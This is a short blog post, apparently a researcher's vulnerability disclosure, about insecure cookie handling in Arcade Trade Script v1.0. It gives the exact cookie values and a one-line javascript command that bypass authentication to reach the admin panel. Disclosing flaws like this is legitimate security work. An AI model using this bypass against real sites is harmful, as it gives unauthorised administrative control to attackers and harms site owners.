I have found a few vulnerability’s in over the last few months which I will be posting here over the next few days. In all cases I have tried to contact the application developer and have included any information regarding in the advisory. Most of them have been cookie related vulnerability’s.
First up is Arcade Trade Script v1.0. Insecure cookie handling allows anyone to simply create a custom cookie with the values below. This will allow full access to the admin panel of the ATS application.
Name – adminLoggedIn
Content – true
Path – /
You can create the cookie by running the following:
javascript:document.cookie =”adminLoggedIn=true; path=/”
The full advisory can be found Here.
Tags: exploit, web application